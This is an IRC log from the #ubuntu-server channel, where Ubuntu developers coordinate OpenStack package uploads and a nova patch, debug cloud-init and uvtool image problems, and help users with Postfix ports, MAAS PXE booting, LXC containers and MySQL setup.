<coreycb> jamespage, ok.  that's odd because I was able to upgrade from b2 successfully.  might be something to do with charm config vs pkg config.
<jamespage> coreycb, yeah I see that on a fresh install
<coreycb> jamespage, ok
<coreycb> jamespage, trove has a dep on xmltodict which is in universe
<jamespage> coreycb, as its in universe that's just fine :-)
<coreycb> jamespage, duh yeah :)
<jamespage> coreycb, trove built - good-oh
<coreycb> jamespage, yep!  I'll get that uploaded.
<ddellav> coreycb trove b3 was waiting on openstackdocstheme, thats why i wasn't pushed. It's good to go now and building, ready for push: lp:~ddellav/ubuntu/+source/openstack-trove
<coreycb> ddellav, jamespage: trove's uploaded
<joelio> grumble.. I wish ubuntu cloud team would get their act together with ubuntu/xenial64 images (specifically for vagrant). Just hit by a bug which means I can't create more than one ubuntu/xenial64 box as it names them all the same! trusty is fine and using chef's is fine... just ubuntu can't... ubuntu.
<joelio> everything gets the name...
<joelio> ==> gateway1: Setting the name of the VM: ubuntu-xenial-16.04-cloudimg
<joelio> obviously that fails hard when using multivm vagrant :)
<joelio> exact same config, but using trusty...
<joelio> ==> gateway1: Setting the name of the VM: devstack-vm_gateway1_1473259350488_72222
<joelio> lovely :)
<joelio> want me to raise a bug?
<coreycb> beisner, jamespage: the following are ready for promotion when you get a chance, please: http://paste.ubuntu.com/23146098/
<Odd_Bloke> joelio: The fixes for that have landed today, and we should hopefully be rolling out a fixed image in the next day or so.
<joelio> Odd_Bloke: no worries, I appreciate this is a group effort
<Odd_Bloke> joelio: :)
<joelio> can switch to trusty for this dev tranche, but will roll out Xenial when we're doing properly
<joelio> thankfully it's nothing too taxing that required xenial or somesuch :)
<joelio> Odd_Bloke: aware if that new image fixes vboxsf or not ooi?
<jgrimm> smb, hallyn: is there any regression bucket you run against qemu when making changes?  or is DEP8 sufficient?
<smb> jgrimm, I did not do substantial changes to qemu, so dep8 was usually enough for me. Serge might have been running more
<jgrimm> smb, cool, yeah fix is mostly isolated to a specific use case on ppc64 architecture, but i'd like to be safe as possible
<hallyn> jgrimm: lp:qa-regression-testing
 * jgrimm looks.  thank you hallyn
<hallyn> run at least test-qemu.py, probably also test-libvirt.py
<jgrimm> got it. thanks!
<hallyn> you'll want to do that in the cloud probably to minimize your own bandwidth usage :)  unless you're one ofthose lucky googlefiber ppl
<hallyn> np - \o
<jgrimm> :)
<hallyn> btw, for changes to qemu in yakkety i still think it would be best to keep them in sync in the ubuntu-dev branch of the debian packaging tree
<hallyn> and, i do mean to keep being helpful with that pkg, but things are a bit manic for the next month or so probably
<hallyn> but shout if you need anything, and i fyou have a pkg you want me to test, that doesn't actualy take me a lot of time.
<jgrimm> hallyn, i deeply appreciate your continued help!
<hallyn> (my container hosting vm is kind of setup to make qemu testing easy :)
<hallyn> np - \o
<jgrimm> hallyn, i have a ppa here if you'd like: ppa:jgrimm/qemu-1541902
<hallyn> which release is that for?
<jgrimm> hallyn, yakkety for this: https://bugs.launchpad.net/ubuntu/+source/qemu/+bug/1541902
<ubottu> Error: Could not gather data from Launchpad for bug #1541902 (https://launchpad.net/bugs/1541902). The error has been logged
<hallyn> ok
<jgrimm> hallyn, ibm offered to help with the unique hardware / use case, so that's covered
<jamespage> coreycb, ok horizon fixes uploaded
<coreycb> jamespage, \o/  looks like that one required some good eye sight.  a dash changed to an underscore.
<jamespage> Odd_Bloke, hey - are you aware of any issues with out yakkety cloud images?
<jamespage> I get this:
<jamespage> E: Malformed entry 11 in list file /etc/apt/sources.list (URI parse)
<jamespage> when trying to update packages
<jamespage> appears to be double space between deb[-src]  yakkety
<jamespage> actually that foorbar
<jamespage> http://paste.ubuntu.com/23146736/
 * rbasak wonders if that's cloud-init
<rbasak> As there has been some work in cloud-init in that area recently
<rbasak> cpaelzer, smoser: ^?
<smoser> :-(
<smoser> jamespage, where do you see this ?
<jamespage> smoser, that was in a yakkety environment I just tried to deploy for openstack
<smoser> http://paste.ubuntu.com/23146752/
<smoser> so it does not reproduce ^ (lxc)
<jamespage> ii  cloud-init                       0.7.7-22-g763f403-0ubuntu1           all          Init scripts for cloud instances
<smoser> can you get me a cloud-init.log file where it happened ?
<jamespage> smoser, http://paste.ubuntu.com/23146756/
<jamespage> smoser, I got that all all 15 instances
<jamespage> Sep  7 16:19:28 ubuntu [CLOUDINIT] cc_apt_configure.py[DEBUG]: got primary mirror:
<jamespage> hmm
<smoser> Sep  7 16:19:27 ubuntu [CLOUDINIT] cc_apt_configure.py[DEBUG]: apt config: convert V2 to V3 format for keys 'apt_mirror'
<smoser> Sep  7 16:19:27 ubuntu [CLOUDINIT] cc_apt_configure.py[DEBUG]: handling apt (module apt-configure) with apt config '{'primary': [{'uri': '', 'arches': ['default']}]}'
<smoser> jamespage, did you provide some config ?
<jamespage> smoser, nope - its was juju instantiated
<smoser> hm.
<jamespage> machine 0 is xenial - that came up ok
<smoser> am i able to get in ?
<jamespage> smoser, yes see pm
<andrewATintellic> If I run `conjure-up openstack` on the MAAS region controller, what is needed for MAAS to be an option in the initial menu (other than `localhost`)?
<andrewATintellic> I remember it just being an option a month or so ago, but it doesn't seem to show up now (MAAS server is a fresh reinstall as of a few days ago)
<jerichowasahoax> What ports do I open in the firewall for a Postfix MTA?
<jerichowasahoax> Google just told me to read main.cf, which has zero references to ports
<jerichowasahoax> Oh hey, after some finagling, I got a stack overflow question for it: 25, 465, and 587
<patdk-wk> do what? who ever answered you is kindof insane
<patdk-wk> 465 was NEVER an email port
<jerichowasahoax> patdk-wk: google disagrees, something about SMTP + SSL
<patdk-wk> 25 and 587 are the only two
<patdk-wk> I thought google was a search engine
<jerichowasahoax> patdk-wk: https://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol
<patdk-wk> you point me to the RFC that says to use 465
<patdk-wk> 465 NEVER made it into a *beta* version of the smtp standard
<jerichowasahoax> patdk-wk: do you also complain every time someone mentions 6667 is the IRC port
<jerichowasahoax> patdk-wk: because that was never in the RFC either
<patdk-wk> jerichowasahoax, that is completely different
<patdk-wk> no one moved to ssl+smtp
<jerichowasahoax> patdk-wk: it's different because you're already yelling at me about SMTP?
<patdk-wk> everyone continues to use port 25
<jerichowasahoax> patdk-wk: because at this point i'm pretty sure you're attacking me for the sake of attacking me
<patdk-wk> irc branched out, to other ports, due to the 64k limit
<patdk-wk> http://blog.mailgun.com/25-465-587-what-port-should-i-use/
<patdk-wk> that is actually a good write up
<JanC> saying that it never was an email port is wrong, of course; it was registered with IANA and was used in the wild
<JanC> but you shouldn't use it in any mailserver nowadays
<patdk-wk> registered and revoked, and never made it into any publications
<hallyn> jgrimm: tests passed
<jgrimm> hallyn, \o/ thanks. ill run them too, just so i learn how to be self-sufficient
<patdk-wk> it's been revoked for almost 20years
<JanC> right
<jerichowasahoax> if 465 winds up getting unused i'll just close the port again
<jerichowasahoax> "sudo ufw delete allow 465" is not that difficult :V
<patdk-wk> that isn't the point
<patdk-wk> the point is to not have users misconfiguring their mail software in the first place
<jerichowasahoax> postfix is default configuration except for I switched to maildir
<patdk-wk> to have them use 587, with login
<patdk-wk> a default configuration is NEVER recommended
<patdk-wk> and if your using ubuntu, you cannot get a postfix default config, you can get a debian config of postfix though
<jerichowasahoax> well i mean i obviously didn't leave the domain as example.com or anything
<jerichowasahoax> "default configuration" means "anything not mentioned in the guide i'm following"
<jerichowasahoax> which is this https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-postfix-on-ubuntu-16-04
<patdk-wk> I see the examples in 16.04 are a lot more sane though, that is nice
<hdon> hi all :) i'm trying to increase mysqld's fd limit. i edited /etc/security/limits.conf and rebooted. if i open a shell with "su -l mysql -s /bin/sh" and evaluate "ulimit -Hn" or "ulimit -Sn" I see 65536. that's good. i edited /etc/mysql/mysql.conf.d/mysqld.conf with "open_files_limit=4096" but if i ask mysqld "select @@open_files_limit;" i still get 1024. is something somewhere else configuring limits for mysqld?
<temhaa> Hello, Am I in right channel I am not sure. But I have a problem. I have a server and I installed ubuntu server. I want to do virtualization. Actually I want to use container something like LXC to create more machine. .
<temhaa> But If I create machine with LXC so Can I install docker and kubernates to that? Do you have any idea or experience?
<nacc> temhaa: do you want to do virtualization or containers?
<temhaa> nacc, Actually I want to virtualization with KVM but I wil try container(lXC) to open more machine. My question is If I use LXC, Can I install docker or kubernates to inside of the that container
<nacc> temhaa: sorry, your first sentence is still confusing to me -- do you want KVM or LXC? If you don't want KVM, just don't mention it. For information on docker under LXD: https://www.stgraber.org/2016/04/13/lxd-2-0-docker-in-lxd-712/ and you might want to join #lxcontainers
<temhaa> nacc, choosing the virtualization method is another problem for me. But my question is If I use lxc can I install docker and kubernates to that lxc container.
<temhaa> nacc, I can not find more documentation on internet. I saw post what you said. But I am looking for kubernates
<OerHeks> docker you can, i am not sure about kubernates ..
<temhaa> nacc, I asked in lxc and kubernates channels but I couldnt get any answer
<nacc> temhaa: well, you said docker or kubernetes -- so you only want kubernetes, really?
<temhaa> nacc, I need docker but additionaly I want to install kubernates.  They can not be at same container.
<nacc> temhaa: https://github.com/kubernetes/kubernetes/issues/6862 ?
<temhaa> nacc, so we can not ~~
<nacc> temhaa: i'm not 100% myself, which lxc channel did you ask in?
<nacc> stgraber: --^ can you chime in?
<temhaa> nacc, I asked to lxc channel called "lxc"  and I asked to kubernates on slack
<stgraber> sorry, never used kubernetes myself. My understanding is that it currently relies on Docker containers and those do work (for the most part) inside LXD containers, but that's the extent of my knowledge there
<nacc> stgraber: thanks
<jonah> hi can anyone please help. I'm trying to tar up some files to move a website to a different server but whatever I do some of the files when untarred are empty
<jonah> I can download them individually and upload them one by one but can't tar them up!
<jonah> There are thousands of files so really need to tar them to move them...
<jonah> If anyone can please help. I've tried zip, tar tar.bz2 etc, every time it is the same.
<jonah> Most files do tar ok and extract ok, but some crucial site system files extract and just have 0 bytes and then cause erros on the site loading
<sarnold> jonah: can you give a concrete example of the command that you used, ls -l output of what you're trying to archive, tar tf output of the tarfile once it's created, tar xvf output, and ls -l of the directory structure after untarring?
<skulltip> should i set up LVM? it's an option on my guided partitioning method thing..  LVM, LV root and LV home-vg
<skulltip> nm went around it
<RoyK> I always use lvm
<skulltip> is it easy to set the internal IP to static so it doesn't get reassigned when there's a power outtage
<sarnold> skulltip: /etc/network/interfaces
<sarnold> skulltip: be sure to modify your network's dhcp server to not hand out that address to clients
<patdk-lap> internal ip?
<skulltip> on clean install of the server 16.04.1, it's stuck with first message:  /dev/sda1: clean:  xxxx / xxx files: 41081418344  blocks
<skulltip> is it hung?
<skulltip> i'm googling that fcsk is running?
<sarnold> that sure sounds like a message from fsck
<skulltip> do i need to wait for it to finish then
<tarpman> might be waiting for the network to come up?
<sarnold> skulltip: it wouldn't be a bad idea to wait, that will mark the date the scan completed and hopeflly push off the date to the next fsck, rather than jhust run it again on the next boot
#ubuntu-server 2016-09-08
<skulltip> trying to set up wordpress.. in mysql,  'grant all privileges on wordperss.* to wpuser@localhost idneitified by 'password';  got 0 rows affected, 1 warning
<nacc> i assume that was a typo? "idneitified"
<sarnold> skulltip: I understand mysql authentication and authorization changed quite a bit in the mysql-5.7 that is in 16.04 LTS -- be sure to follow a guide that's been updated
<nacc> also very true
 * sarnold pins the eagle-eye-reader badge on nacc's merit badge sash
<tarpman> and wordperss.*
<sarnold> heh also "wordperss.*" .. reminds me of "ERMAGERD"
<skulltip> https://www.atlantic.net/community/howto/install-wordpress-ubuntu-16-04/
<skulltip> do i need to create a wpuser in my etc/hosts file?
<sarnold> /etc/hosts has IPs and names that you can use to supplement DNS if you wish..
<skulltip> why am i getting a warning and 0 rows affected with this..   grant all privileges on wordpress.* to myuser@localhost identified by "password";
<sarnold> skulltip: is this related? http://dev.mysql.com/doc/refman/5.7/en/sql-mode.html#sqlmode_no_auto_create_user
<twb> http://old-releases.ubuntu.com/releases/  has the EOL'd install media, but are the apt repos available anywhere?
<stgraber> twb: http://old-releases.ubuntu.com/ubuntu/
<twb> Thanks
<lordievader> Good morning.
<PCdude> goodmorning lordievader
<PCdude> I thought u were in a different timezone, but apparently not haha
<lordievader> Hey PCdude
<PCdude> lordievader: how are u today?
<lordievader> Doing okay here, just made coffee.
<lordievader> How are you?
<PCdude> pretty okay, woke up an hour ago. I am free this morning and still searching for a solution of my problem :)
<lordievader> What problem?
<PCdude> http://askubuntu.com/questions/821804/openstack-with-landscape-install-fails
<sarnold> "After about 2900 seconds it fails" ouch
<sarnold> that's a long-ass time to wait to find out if it works or not
<lordievader> I don't know openstack, but: Failed to get ip directly: [Errno -2] Name or service not known
<PCdude> sarnold: bloody good point! I tried to let it time out earlier, but of course that is not working
<lordievader> Not sure if that matters.
<PCdude> lordievader: yeah I saw that too, but I have not clue what it means or is referring too let alone how to solve it :)
<PCdude> uhm, internet was bad for a second, I could have missed some messages
<sarnold> PCdude: the last we saw from you was "yeah I saw that too..."
<lordievader> PCdude: To me that error sounds like a dns resolver not working, or something like that.
<PCdude> sarnold: ah ok
<PCdude> lordievader: DNS resolver works on both the nodes and the controller. I checked that, I even logged in during the install to the node JUJU was using and even there was an active and working internet connection including capabilities of DNS resolving
<lordievader> Hmm
<sarnold> PCdude: is the part about KVM extensions not working important?
<lordievader> PCdude: There is a juju channel, perhaps they are able to help you
<lordievader> ?
<PCdude> sarnold: not really, I use vmare esxi rn, for the nodes and controller, but maybe it is complaining since openstack wants to add capabilities for KVM to one of the nodes I dont know
<PCdude> lordievader: yeah tried it yesterday, gonna do that again today :)
<sarnold> PCdude: ahh. turtles all the way down..
<PCdude> sarnold: for sure, the error logs are not that descriptive at times
<cpaelzer> rbasak: is there another volume creation path in uvtool ?
<cpaelzer> rbasak: I have fixed up the one we talked about
<cpaelzer> and I see it created as
<cpaelzer> http://paste.ubuntu.com/23149276/
<cpaelzer> well it is the "right" image being kvmguest-precise.qcow
<cpaelzer> never the less it bails out with
<cpaelzer> kvm: -drive file=/var/lib/uvtool/libvirt/images/kvmguest-precise.qcow,if=none,id=drive-virtio-disk0,format=qcow2: '' uses a qcow2 feature which is not supported by this qemu version: QCOW version
<cpaelzer> checking the image file header with hexdump now
<cpaelzer> rbasak: found it - the reason is that the backing file is too new
<cpaelzer> so even when specifying compat on the new one it fails as /var/lib/uvtool/libvirt/images/x-uvt-b64-Y29tLnVidW50dS5jbG91ZC5kYWlseTpzZXJ2ZXI6MTIuMDQ6YW1kNjQgMjAxNjA4Mjk= is too new
<cpaelzer> maybe it would even have been ok without any patch to uvt if the initial backing file would have been created on precise
<cpaelzer> I'll delete and try that
<cpaelzer> that backing is what a sync brings in right?
<cpaelzer> yep thats it
<cpaelzer> purge and recreate the base image solves that
<cpaelzer> rbasak: I updated bug 1620633 about it and set it to won't fix
<ubottu> bug 1620633 in uvtool (Ubuntu) "qcow image created in precise is not usable" [Low,Won't fix] https://launchpad.net/bugs/1620633
<cpaelzer> thanks irc for being patient with my need to mumble while debugging :-)
<frickler> jamespage: regarding https://bugs.launchpad.net/bugs/1608934 , https://review.openstack.org/355415 still needs to merge in master, but if you could put that patch into mitaka packages while upstream ponders proper unit tests, that would be nice for us
<ubottu> Launchpad bug 1608934 in Ubuntu Cloud Archive newton "ephemeral/swap disk creation fails for local storage with image type raw/lvm" [High,Triaged]
<geoff10000_> morning all, I need to upgrade openssh-client on my 14.04 rancid server - how?
<jamespage> frickler, hmm
<jamespage> well I might pull it into newton packages, but I'd like to see it landed in master branch first before we start SRU process
<ANTARES> http://ÐºÐ¸Ð±ÐµÑÐ°Ð¼Ð¿ÐµÑ.ÑÑ/Ð¿ÑÐ¸Ð³Ð»Ð°ÑÐ°ÐµÐ¼_Ðº_ÑÐ¾ÑÑÑÐ´Ð½Ð¸ÑÐµÑÑÐ²Ñ_Ð¿ÑÐµÐ´Ð¿ÑÐ¸Ð½Ð¸Ð¼Ð°ÑÐµÐ»ÐµÐ¹_Ð³ÑÑÐ¿Ð¿Ñ_Ð±ÑÐ¸ÐºÑ
 * joelio saw an updated ubuntu/xenial64 image and thought it would work - unfortunately there are auth errors or ssh connectivity issues
<rbasak> cpaelzer: there was a plan to rewrite the images before writing to the libvirt pool. hallyn suggested it IIRC. Decompressing for increased COW efficiency/performance, or something like that. I don't think there's a bug on it. If we do that, then we'll have the opportunity to use an older format if you wish. Or perhaps too much effort (but implementing hallyn's suggestion would be nice anyway).
<rbasak> And, if you care about uvtool performance, that's probably a relatively easy win.
 * rbasak goes back to his vacation
<ANTARES> https://www.youtube.com/watch?v=9QBeal8wXB8
<OerHeks> ANTARES, why do we need to click that url ?
<OerHeks> oh, you were spamming before...
<ANTARES> it is music
<ANTARES> shanson
<OerHeks> wrong channel dude. this is ubuntu support.
<ANTARES> relax
<ANTARES> )
<ANTARES> ÐÑÑÐ³Ð¾Ð¹ ÑÐ°ÐºÐµÑ
<jamespage> coreycb, ddellav: went through the UCA bugs today - https://bugs.launchpad.net/cloud-archive/+bugs
<jamespage> not looking so bad...
<coreycb> jamespage, looks much better for sure
<ddellav> jamespage I'm having an issue building aodh for liberty and it looks like it can't find pep8 during the tests. It seems like hacking pins pep8 and I know you did something recently with that. Is there an additional set I need to take to get this building properly? I'm using sbuild-liberty
<ddellav> coreycb ^
<ddellav> *step
<coreycb> ddellav, you may just need to add python-pep8 to BDs
<ddellav> coreycb yea, thats what I'm doing temporarily but I wanted to check for a proper solution if it exists
<jamespage> ddellav, only in newton
<jamespage> not in liberty
<jamespage> aodh in liberty?
 * jamespage looks
<jamespage> ddellav, its not failing in the branch package builds
<jamespage> ddellav, oh cause we don't build it
<jamespage> that would be why
<ddellav> jamespage there was actually no liberty branch in the package repo. I had to create one using the debian/1.0.0-11 tag
<jamespage> ddellav, hmm so its a new 1.0.0 release?
<ddellav> jamespage well, 1.1.2
<jamespage> ddellav, hmm
<jamespage> I'm pondering whether we should even update it tbh
<jamespage> it was the first release, we can't deploy and test it using charms (baselined on mitaka)
<jamespage> we don't have to take retrospective ownership of things in past releases IMHO
<ddellav> shall i skip for now then?
<zioproto> hello
<zioproto> jamespage: how are you doing ? We just finished our Liberty upgrade yesterday night in production. Our users notified us this nice bug today :) https://bugs.launchpad.net/nova/+bug/1610015 with a fix in master of course https://review.openstack.org/#/c/355415/
<ubottu> Launchpad bug 1610015 in OpenStack Compute (nova) "Creating an instance using images_type=lvm fails on ephemeral volume creation" [Undecided,New]
<zioproto> have you guys been already working on this ?
<zioproto> coreycb: are you around ?
<jamespage> zioproto, hey
<zioproto> hello :) sorry for coming here only when I have bugs
 * jamespage looks
<jamespage> zioproto, np :-)
<zioproto> I should bring beers sometimes :)
<jamespage> zioproto, ah frickler raised this again to me today as well when I was doing some triage on nova bugs
<jamespage> <frickler> jamespage: regarding https://bugs.launchpad.net/bugs/1608934 , https://review.openstack.org/355415 still needs to merge in master, but if you could put that patch into mitaka packages while upstream ponders proper unit tests, that would be nice for us
<ubottu> Launchpad bug 1608934 in Ubuntu Cloud Archive newton "ephemeral/swap disk creation fails for local storage with image type raw/lvm" [High,Triaged]
<jamespage> oh no thats a different one
<jamespage> grrrr
<jamespage> zioproto, no that is the same issue
<zioproto> So I will try to compile the git review 355415 againt the current Liberty package
<zioproto> I will tell you how it goes
<jamespage> zioproto, ta - that feedback on the bug reports would be good
<jamespage> afaict that impacts liberty, mitaka and newton atm
<zioproto> yes, I will be able only to test on liberty
<zioproto> I dont have mitaka deployments available
<zioproto> jamespage: to test this patch it would be enough to upgrade the deb packages on the hypervisor where the VM is scheduled right ? I dont need to upgrade packages everywhere. Agreed ?
<frickler> zioproto: yes, you could also just patch the single line and restart nova-compute
<jamespage> zioproto, yeah I think so
<frickler> fwiw I just marked one of the bugs as duplicate of the other
<jamespage> frickler, +1 ta
<zioproto> OK I patched manually
<zioproto> I did python -m py_compile imagebackend.py
<zioproto> to regenerate the pyc file
<zioproto> and I restarted nova-compute
<zioproto> my users confirm the bug is fixed
<zioproto> the patch does not cherry-pick clean on liberty
<jamespage> zioproto, yah - I just hit that as well
<jamespage> (not a clean cherry pick)
<zioproto> https://review.openstack.org/367412
<zioproto> here you go
<zioproto> now is clean
<zioproto> jamespage: oh no there is a collision with this other patch libvirt-Split-out-resize_image-logic-from-create_ima.patch
<zioproto> oh I see why the conflict. This is in the liberty package but not upstream in liberty https://review.openstack.org/#/c/334074/
<zioproto> jamespage: I hate quilt stuff :) https://www.dropbox.com/s/2pf2oy0a83lgh3u/nova-367412-rebased.patch?dl=0
<jamespage> zioproto, gah - I thought that was upstream
<zioproto> I am building with sbuild-liberty at the moment
<zioproto> you can use the rebased patch I just linked in my dropbox
<zioproto> and add it as last one in the series
<hallyn> cpaelzer: hey - (don't really have time to discuss, but wanted to ask)  what did you mean in the email by
<hallyn> OTOH Debian and Fedora have just machine classes as-is upstream.
<hallyn> ?  I could be misremembering but i thought that fedora had its own machine types
<hallyn> i *think* that's where i got the model for what we started doing in ubuntu.  which (as you've most likely seen0) was done in reaction to
<hallyn> the live migration debacle between qemu-kvm and qemu, where the same machine type name meant different things
<hallyn> so the most important thing was to get unambiguous machine types
<hallyn> so even if those are out of date, that's not so important as making sure they are named so that if things change upstream we can keep them exactly the same
<hallyn> cpaelzer: also, you might join #debian-qemu, and see if you can get onto the debian qemu maintainers team and get write access to the ubuntu-dev branch there :)
 * hallyn bbl
<jamespage> ddellav, skip aodh in liberty
<jamespage> lets own it from mitaka onwards
<jamespage> so we have pkg ci
<ddellav> jamespage consider it skipped!
<zioproto> what is aodh ?
<jamespage> zioproto, it was split out of ceilometer two releases ago - its the alarming part
<zioproto> OK
<zioproto> jamespage: my patch failes the python tests https://www.dropbox.com/s/ckraqbb3vou9d7x/nova_12.0.4-0ubuntu1~cloud1ubuntu1_amd64-20160908-1431.build?dl=0
<jamespage> zioproto, I suspect the test case will need adjusting for libery
<zioproto> ok, I will need to remove the tests from the patch just to rebuild internally for SWITCH
<zioproto> because we need the package today
<cpaelzer> hallyn: hi
<cpaelzer> hallyn: fedora has no custom types
<cpaelzer> hallyn: just checked again in afedora container
<cpaelzer> hallyn: thanks for the hint to join #debian-qemu
<jamespage> zioproto, sure we can figure out the unit test later
<cpaelzer> hallyn: you likely got the model idea from centos/rh - that is where it is used (exclusively in their cases, no upstream models at all)
<hallyn> oh yeah, rh
<ddellav> coreycb please review and push lp:~ddellav/ubuntu/+source/designate lp:~ddellav/ubuntu/+source/manila for liberty sru
<zioproto> jamespage: here you go
<zioproto> we are running these in production now https://code.launchpad.net/~zioproto/ubuntu/+source/nova/+git/nova/+merge/305234
<zioproto> bye bye
<coreycb> ddellav, can you grab the missing d/changelog from the liberty-staging ppa, like this? https://git.launchpad.net/~ubuntu-server-dev/ubuntu/+source/neutron-fwaas/commit/?id=eed67222490ec24ce804ae7a96776ec99f4a4433
<ddellav> coreycb ugh, right, i missed that in my notes. Got it.
<samba35> i am on ubuntu host and my guest is also ubuntu using kvm i want to boot ubuntu guest on diskless machine .how do i get this done
<samba35> i have firewall/utm which can be used as a dhcp server with boot option
<compdoc> you want to boot the guest from the .iso image?
<samba35> i want to boot from guest not iso
<compdoc> describe what you mean by diskless machine
<samba35> is it possible to boot from iso with kvm ?
<compdoc> sure
<samba35> on ubuntu guest i have installed firewall/utm and that can take care of booting part i have to just point file
<samba35> using dhcp options
<samba35> i have another system from which presently i am chating i want to use that system as a bootable guest from kvm host
<samba35> using ipxe /pxe
<apb1963_>  i have installed 16.04 on /dev/sdb1 ... I used fdisk to change the boot flag from /dev/sda2 to sdb1, as sda2 contains 14.04.  It not only doesn't boot, but it doesn't show in the boot menu.  I tried to follow this link without much luck, my files don't match what's described here: https://help.ubuntu.com/lts/installation-guide/i386/ch05s01.html#boot-initrd  It boots 14.04 instead.
<jamespage> coreycb, ok promoting proposed->updates for newton
<coreycb> jamespage, awesome
<coreycb> jamespage, I'm sending the b3 release email here in a sec
<andrewII> I am trying to commision additional MAAS nodes, but PXE is erroring out due to a TFTP error. The node flashes "NBP filesize is 0 Bytes" (for bootx64.efi). Any idea of what could cause that?
<andrewII> I'm wondering if Squid could be getting in the way, but I think port 69 is open for it
<apb1963_> andrewII: A dumb answer but... have you verified the file is where it's supposed to be and it's non-zero?
<andrewII> I haven't, other than two other machines commisioned just an hour earlier. They finally commissioned once I turned Squid on, but now I can't seem to get PXE to work, even with squid off.
<andrewII> I've been rebuilding my MAAS setup over and over (fruitlessly) trying to get Openstack bootstrapped on it. But I haven't the foggiest how to diagnose this particular glitch
<andrewII> All 5 machines were commissioned yesterday, so I know the hardware is good, but I've reinstalled the region controller since then
<apb1963_> andrewII: have you verified the file is where it's supposed to be and it's non-zero?  If not, then you should do that.  Because that's what that error message says.  I would listen to the messge.
<andrewII> apb1963: I'll ask ag to find the file. If it got zeroed out, that'd be both a relief and horribly confusing
<andrewII> apb1963: Well, there's a 79K /usr/lib/systemd/boot/efi/systemd-bootx64.efi
<apb1963_> now verify that's where tftp is looking for it.
<samba35> i have install maas ( for a 1st time as web page instruction ) but i am not able to get maas webadmin page but i am able to get default web page of my server/localhost
<samba35> andrewII : after apt-get install maas what i suppose to do ,more package need to install or make changes in config file
<andrewII> samba35: When you try to open the page, are you going to http://<MAAS server's IP>/MAAS?
<samba35> maas server ip and my server ip are differant ?
<andrewII> If you leave off the MAAS part, then you get a regular ol' Apache default page (meaning everything's working, but there's nothing to see yet)
<samba35> sorry i just want to do what u did ,if u check chat 10 line back
<andrewII> My MAAS server is a different machine (in this case 192.168.0.222), so to get to it I enter http://192.168.0.222/MAAS
<samba35> how do i check which ip address is configure for maas server ?
<andrewII> Personally? I do it the ham-fisted way and set it myself: sudo dpkg-reconfigure maas-region-controller
<samba35> ic
<andrewII> It'll have just one input box, and you'll enter the address the system expects your nodes to see when commissioning/deploying (you can use any other address that your computer answers to)
<samba35> if you dont mind can i ask u some quastions on MAAS ?
<andrewII> Haha, sure. I've gotten it to spin up a few times, but no bets on if I can get it to actually work
<samba35> thanks
<samba35> if i understand correctly what maas is :1)allow you to boot from guest os ?
<samba35> 2) ipxe/pxe/gpxe booting make simpleier ?
<samba35> 3)manage guest os ?
<samba35> is that correct ?
<PCdude> http://askubuntu.com/questions/821804/openstack-with-landscape-install-fails
<PCdude> Could someone please help with that
<andrewII> samba35: Sort of? I think it's more like having one machine manage a bunch of other machines. So you'll add a machine to your main MAAS controller (the one you did "sudo apt install maas"), and that machine will bring others online as you like
<samba35> ok
<samba35> which link/website you follow to configure maas
<andrewII> You know, I've been following one of the Juju dev's blogs for it: http://blog.naydenov.net/
<andrewII> I am expressly trying to get Openstack on MAAS 2.0, so this was helpful
<samba35> ok
<samba35> thanks
<andrewII> Prolly worth noting that I *haven't* actually gotten it to work, but I'm sure it's because I've missed something
<andrewII> apb1963_: Well, one machine recommisioned just fine. So either the two machines are getting treated differently, or something strange is going on with PXE
<apb1963_> andrewII: sorry.... i've gone as far as I can.  I know anything about MAAS itself.... just gave you a couple of basic troubleshooting ideas.  Other than that... no idea.  Firewall is a good thing to doublecheck.... permissions too....beyond that... no idea.
<apb1963_> s/know/don't know/
<samba35> brb ,rebooting
<andrewII> apb1963_: heh, same here. But thanks!
<apb1963_> sure.  good luck!
<ANTARES> http://www.megapolisfm.ru ÐÐ¤ÐÐÐÐÐÐ«Ð Ð¥ÐÐ Ð¥ÐÐ Ð¸ R&B !!! Ð´Ð¾ 21:00
<van777> ANTARES: Ð´Ð° Ð½Ñ ÐµÐ³Ð¾. ÐÑÑÑÐµ ÑÐ°Ð´Ð¸Ð¾ ÑÐµÐºÐ¾ÑÐ´. Ð¢Ð°Ð¼ ÑÐ°Ð·Ð½ÑÐµ Ð½Ð°Ð¿ÑÐ°Ð²Ð»ÐµÐ½Ð¸Ñ. Ð¥Ð°ÑÐ´ÐºÐ¾Ñ,ÐÐ°Ð±ÑÐ¸Ðº - Ð½Ð¾ÑÐ¼.
<nacc> teward: any chance you could take a look at LP: #1620627?
<ubottu> Launchpad bug 1620627 in nginx (Ubuntu) "package nginx 1.10.0-0ubuntu0.16.04.2 failed to install/upgrade: Ð¿ÑÐ¾Ð±Ð»ÐµÐ¼Ñ Ð·Ð°Ð²Ð¸ÑÐ¸Ð¼Ð¾ÑÑÐµÐ¹ â Ð¾ÑÑÐ°Ð²Ð»ÑÐµÐ¼ Ð½Ðµ Ð½Ð°ÑÑÑÐ¾ÐµÐ½Ð½ÑÐ¼" [Undecided,New] https://launchpad.net/bugs/1620627
<nacc> i'm not seeing any obvious local configuration, but it seems like nginx timed out? -- not sure if the /run/nginx.pid message is expected or not?
<nacc> hallyn: re: triage of server bugs, would you be ok if i just left LP: #1617055 alone?
<ubottu> Error: Could not gather data from Launchpad for bug #1617055 (https://launchpad.net/bugs/1617055). The error has been logged
<MelRay> I asked in #ubuntu and the response indicated I might be better off using the server edition. What I'm trying to find out if during the install if it is possible to have both physical disks installed in the LVM volume group? That way it should automatically have all available space allocated for /boot and /root I suppose?
<teward> nacc: i've not seen that before, and I did see the bug, but i'm not well right now
<teward> so I didn't look into it much
<hallyn> nacc: yeah, i'd mark it wontfix maybe, leavin ga ocmment saying debian hasn't done it yet.
<teward> nacc: the problem core is this: ÑÐµÐ½ 06 20:17:33 Novohudonossor systemd[1]: nginx.service: PID file /run/nginx.pid not readable (yet?) after start: No such file or directory
<hallyn> nacc: you can ask them which patches they need and see if they are feasible to backport;  or you can just go ahead and merge the upstream, if you feel brave
<teward> nacc: makes me think something's tried to start and create the pid, but couldn't find it
<teward> i've never seen that though
<hallyn> but in general our stance is we merge debian when it's ready
<nacc> teward: ack, feel better! i'll respond in the bug
<nacc> hallyn: thanks! i'm just triaging right now, but i'll come back to it if no one else does :) it does seem like they might just need the one commit right now
<nacc> MelRay: i wonder if you might be able to modify the recipe at http://askubuntu.com/questions/542327/how-do-i-preseed-partman-recipe-two-disks
<teward> nacc: possible cause: /run/ not mounted/ready
<MelRay> nacc: Thanks I'll have a look! Appreciate it
